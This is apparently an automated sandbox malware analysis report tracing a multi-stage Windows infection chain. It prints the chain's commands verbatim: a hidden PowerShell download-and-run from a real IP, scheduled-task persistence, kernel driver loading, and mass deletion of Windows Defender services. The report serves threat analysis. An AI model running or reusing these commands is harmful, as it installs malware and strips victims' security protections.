description	pid	Process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeIncreaseQuotaPrivilege	2220	powershell.exe
Token: SeSecurityPrivilege	2220	powershell.exe
Token: SeTakeOwnershipPrivilege	2220	powershell.exe
Token: SeLoadDriverPrivilege	2220	powershell.exe
Token: SeSystemProfilePrivilege	2220	powershell.exe
Token: SeSystemtimePrivilege	2220	powershell.exe
Token: SeProfSingleProcessPrivilege	2220	powershell.exe
Token: SeIncBasePriorityPrivilege	2220	powershell.exe
Token: SeCreatePagefilePrivilege	2220	powershell.exe
Token: SeBackupPrivilege	2220	powershell.exe
Token: SeRestorePrivilege	2220	powershell.exe
Token: SeShutdownPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeSystemEnvironmentPrivilege	2220	powershell.exe
Token: SeRemoteShutdownPrivilege	2220	powershell.exe
Token: SeUndockPrivilege	2220	powershell.exe
Token: SeManageVolumePrivilege	2220	powershell.exe
Token: 33	2220	powershell.exe
Token: 34	2220	powershell.exe
Token: 35	2220	powershell.exe
Token: 36	2220	powershell.exe
Token: SeDebugPrivilege	4120	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4120	PowerShell.exe
Token: SeSecurityPrivilege	4120	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4120	PowerShell.exe
Token: SeLoadDriverPrivilege	4120	PowerShell.exe
Token: SeSystemProfilePrivilege	4120	PowerShell.exe
Token: SeSystemtimePrivilege	4120	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4120	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4120	PowerShell.exe
Token: SeCreatePagefilePrivilege	4120	PowerShell.exe
Token: SeBackupPrivilege	4120	PowerShell.exe
Token: SeRestorePrivilege	4120	PowerShell.exe
Token: SeShutdownPrivilege	4120	PowerShell.exe
Token: SeDebugPrivilege	4120	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4120	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4120	PowerShell.exe
Token: SeUndockPrivilege	4120	PowerShell.exe
Token: SeManageVolumePrivilege	4120	PowerShell.exe
Token: 33	4120	PowerShell.exe
Token: 34	4120	PowerShell.exe
Token: 35	4120	PowerShell.exe
Token: 36	4120	PowerShell.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeIncreaseQuotaPrivilege	4120	PowerShell.exe
Token: SeSecurityPrivilege	4120	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4120	PowerShell.exe
Token: SeLoadDriverPrivilege	4120	PowerShell.exe
Token: SeSystemProfilePrivilege	4120	PowerShell.exe
Token: SeSystemtimePrivilege	4120	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4120	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4120	PowerShell.exe
Token: SeCreatePagefilePrivilege	4120	PowerShell.exe
Token: SeBackupPrivilege	4120	PowerShell.exe
Token: SeRestorePrivilege	4120	PowerShell.exe
Token: SeShutdownPrivilege	4120	PowerShell.exe
Token: SeDebugPrivilege	4120	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4120	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4120	PowerShell.exe
Token: SeUndockPrivilege	4120	PowerShell.exe
Token: SeManageVolumePrivilege	4120	PowerShell.exe
Token: 33	4120	PowerShell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4588	amnew.exe
5112	Bell_Setup16.tmp

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 4164	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3588 wrote to memory of 4164	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3588 wrote to memory of 4164	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3588 wrote to memory of 3936	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3588 wrote to memory of 3936	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3588 wrote to memory of 3936	3588	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4164 wrote to memory of 4392	4164	cmd.exe	90
PID 4164 wrote to memory of 4392	4164	cmd.exe	90
PID 4164 wrote to memory of 4392	4164	cmd.exe	90
PID 3936 wrote to memory of 1480	3936	mshta.exe	93
PID 3936 wrote to memory of 1480	3936	mshta.exe	93
PID 3936 wrote to memory of 1480	3936	mshta.exe	93
PID 1480 wrote to memory of 3764	1480	powershell.exe	98
PID 1480 wrote to memory of 3764	1480	powershell.exe	98
PID 1480 wrote to memory of 3764	1480	powershell.exe	98
PID 3764 wrote to memory of 4692	3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE	101
PID 3764 wrote to memory of 4692	3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE	101
PID 3764 wrote to memory of 4692	3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE	101
PID 4692 wrote to memory of 4588	4692	rapes.exe	105
PID 4692 wrote to memory of 4588	4692	rapes.exe	105
PID 4692 wrote to memory of 4588	4692	rapes.exe	105
PID 4588 wrote to memory of 2316	4588	amnew.exe	106
PID 4588 wrote to memory of 2316	4588	amnew.exe	106
PID 4588 wrote to memory of 2316	4588	amnew.exe	106
PID 4692 wrote to memory of 2324	4692	rapes.exe	107
PID 4692 wrote to memory of 2324	4692	rapes.exe	107
PID 4692 wrote to memory of 2324	4692	rapes.exe	107
PID 2324 wrote to memory of 4992	2324	gLLOqKC.exe	108
PID 2324 wrote to memory of 4992	2324	gLLOqKC.exe	108
PID 2324 wrote to memory of 4992	2324	gLLOqKC.exe	108
PID 2316 wrote to memory of 5072	2316	futors.exe	110
PID 2316 wrote to memory of 5072	2316	futors.exe	110
PID 5072 wrote to memory of 1772	5072	v7942.exe	111
PID 5072 wrote to memory of 1772	5072	v7942.exe	111
PID 5072 wrote to memory of 1772	5072	v7942.exe	111
PID 4692 wrote to memory of 2380	4692	rapes.exe	115
PID 4692 wrote to memory of 2380	4692	rapes.exe	115
PID 4692 wrote to memory of 2380	4692	rapes.exe	115
PID 2380 wrote to memory of 3644	2380	apple.exe	116
PID 2380 wrote to memory of 3644	2380	apple.exe	116
PID 2380 wrote to memory of 3644	2380	apple.exe	116
PID 3644 wrote to memory of 3716	3644	221.exe	117
PID 3644 wrote to memory of 3716	3644	221.exe	117
PID 3716 wrote to memory of 1340	3716	cmd.exe	119
PID 3716 wrote to memory of 1340	3716	cmd.exe	119
PID 3716 wrote to memory of 1340	3716	cmd.exe	119
PID 1340 wrote to memory of 640	1340	221.exe	120
PID 1340 wrote to memory of 640	1340	221.exe	120
PID 640 wrote to memory of 4928	640	cmd.exe	122
PID 640 wrote to memory of 4928	640	cmd.exe	122
PID 640 wrote to memory of 3868	640	cmd.exe	123
PID 640 wrote to memory of 3868	640	cmd.exe	123
PID 640 wrote to memory of 2264	640	cmd.exe	124
PID 640 wrote to memory of 2264	640	cmd.exe	124
PID 640 wrote to memory of 3912	640	cmd.exe	125
PID 640 wrote to memory of 3912	640	cmd.exe	125
PID 640 wrote to memory of 4120	640	cmd.exe	126
PID 640 wrote to memory of 4120	640	cmd.exe	126
PID 640 wrote to memory of 4744	640	cmd.exe	127
PID 640 wrote to memory of 4744	640	cmd.exe	127
PID 640 wrote to memory of 4124	640	cmd.exe	128
PID 640 wrote to memory of 4124	640	cmd.exe	128
PID 640 wrote to memory of 4600	640	cmd.exe	129
PID 640 wrote to memory of 4600	640	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3516
- C:\Users\Admin\AppData\Local\Temp\2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  "C:\Users\Admin\AppData\Local\Temp\2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn CRDRBma2VEw /tr "mshta C:\Users\Admin\AppData\Local\Temp\MZJd16wdJ.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn CRDRBma2VEw /tr "mshta C:\Users\Admin\AppData\Local\Temp\MZJd16wdJ.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4392
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\MZJd16wdJ.hta
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Users\Admin\AppData\Local\Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
        
        "C:\Users\Admin\AppData\Local\Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3764
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\10391260101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10391260101\amnew.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        8⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5072
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1584
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\is-UABUS.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UABUS.tmp\Bell_Setup16.tmp" /SL5="$F02BE,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\is-RIPRU.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RIPRU.tmp\Bell_Setup16.tmp" /SL5="$1002BE,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:5112
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        13⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        9⤵
        Executes dropped EXE
        
        PID:4072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1668
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        10⤵
        Executes dropped EXE
        
        PID:1400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4684
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        9⤵
        
        PID:1916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\10046160101\a413676634.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046160101\a413676634.exe"
        9⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046160101\a413676634.exe"
        10⤵
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\10046170101\529d34fda9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046170101\529d34fda9.exe"
        9⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046170101\529d34fda9.exe"
        10⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\10391640101\gLLOqKC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10391640101\gLLOqKC.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
        9⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\f9827b8d90\tgvazx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f9827b8d90\tgvazx.exe"
        10⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\10392050101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392050101\apple.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3644
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EC06.tmp\EC07.tmp\EC08.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1340
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ECF0.tmp\ECF1.tmp\ECF2.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        11⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:640
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        12⤵
        Launches sc.exe
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        Launches sc.exe
        
        PID:3868
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        12⤵
        Delays execution with timeout.exe
        
        PID:2264
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        12⤵
        Launches sc.exe
        
        PID:3912
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        Launches sc.exe
        
        PID:4120
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4744
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4124
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:4600
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        12⤵
        
        PID:3588
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        12⤵
        Launches sc.exe
        
        PID:3232
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        12⤵
        Launches sc.exe
        
        PID:4032
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        12⤵
        
        PID:396
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:376
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:2572
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        12⤵
        
        PID:3224
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        12⤵
        Launches sc.exe
        
        PID:4320
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        12⤵
        Launches sc.exe
        
        PID:4108
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        12⤵
        
        PID:3260
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        12⤵
        Launches sc.exe
        
        PID:1600
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        12⤵
        Launches sc.exe
        
        PID:2492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        12⤵
        Modifies security service
        
        PID:2136
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:3964
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        12⤵
        
        PID:1140
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        12⤵
        Launches sc.exe
        
        PID:4448
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        12⤵
        Launches sc.exe
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        12⤵
        
        PID:2944
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:3148
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:1328
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        12⤵
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        12⤵
        Launches sc.exe
        
        PID:2484
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        12⤵
        Launches sc.exe
        
        PID:3296
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        12⤵
        
        PID:3928
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        12⤵
        Launches sc.exe
        
        PID:4832
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        12⤵
        Launches sc.exe
        
        PID:708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        12⤵
        
        PID:1584
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:3120
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:4776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        12⤵
        
        PID:4704
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        12⤵
        Launches sc.exe
        
        PID:1120
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        12⤵
        Launches sc.exe
        
        PID:448
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        12⤵
        
        PID:4328
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:1008
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        12⤵
        
        PID:4632
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        12⤵
        Launches sc.exe
        
        PID:2276
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        12⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        12⤵
        
        PID:4904
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:3492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        12⤵
        
        PID:1796
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        12⤵
        
        PID:3640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        12⤵
        
        PID:4736
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        12⤵
        
        PID:2640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        12⤵
        
        PID:4684
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        12⤵
        
        PID:4392
        
        C:\Windows\system32\sc.exe
        
